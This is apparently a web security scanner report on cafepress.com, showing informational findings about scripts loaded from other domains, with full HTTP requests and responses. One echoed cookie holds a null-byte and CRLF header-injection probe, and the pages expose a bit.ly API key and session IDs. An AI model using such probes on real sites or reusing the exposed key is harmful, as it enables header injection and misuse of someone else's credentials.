HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Cteonnt-Length: 118606 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:56:00 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 118606 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <!-- this one is for ajax stuff --><script type="text/javascript" src="http://content9.cpcache.com/js/http_request.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]... 
</script><script src="http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"> </script>...[SNIP]... <!--End TellApart--><script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"> </script>...[SNIP]...
5.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The response dynamically includes the following scripts from other domains:
http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/js/http_request.js
http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 95184 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ASP.NET_SessionId=hgypw52u3gij4ovwij2xb245; domain=cafepress.com; path=/; HttpOnly Set-Cookie: cpvr=b7228e23-2409-4402-9cd7-ee1a3db28b4f; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:48 GMT; path=/ Set-Cookie: cpv=8f33e318-123c-4498-9d41-8084438c139c; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:48 GMT; path=/ Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: pid.guid=6e8d3e27-a6be-4a44-b5ef-2939ef9ee677; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:48 GMT; path=/ Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp-v=40EF613B13210CD6C2BDE6E814B3A8DC; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:48 GMT; path=/ Set-Cookie: cppss=2x3; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 95184 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... 
<!-- this one is for ajax stuff --><script type="text/javascript" src="http://content0.cpcache.com/js/http_request.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]... </script><script src="http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"> </script>...[SNIP]... <!--End TellApart--><script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"> </script>...[SNIP]...
5.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The response dynamically includes the following scripts from other domains:
http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content8.cpcache.com/js/http_request.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 93172 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93172 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <!-- this one is for ajax stuff --><script type="text/javascript" src="http://content8.cpcache.com/js/http_request.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]... </script><script src="http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"> </script>...[SNIP]... <!--End TellApart--><script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"> </script>...[SNIP]...
5.5. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The response dynamically includes the following scripts from other domains:
http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content5.cpcache.com/js/http_request.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 95181 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:44:01 GMT Connection: close Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly Set-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/ Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/ Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 95181 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... 
<!-- this one is for ajax stuff --><script type="text/javascript" src="http://content5.cpcache.com/js/http_request.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]... </script><script src="http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"> </script>...[SNIP]... <!--End TellApart--><script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"> </script>...[SNIP]...
5.6. http://www.cafepress.com/+aprons
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content6.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+aprons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 60330 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content6.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.7. http://www.cafepress.com/+baby-blanket
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-blanket
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+baby-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 58677 Date: Sun, 26 Dec 2010 13:46:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/ Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58677 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.8. http://www.cafepress.com/+baby-bodysuits
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-bodysuits
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+baby-bodysuits HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
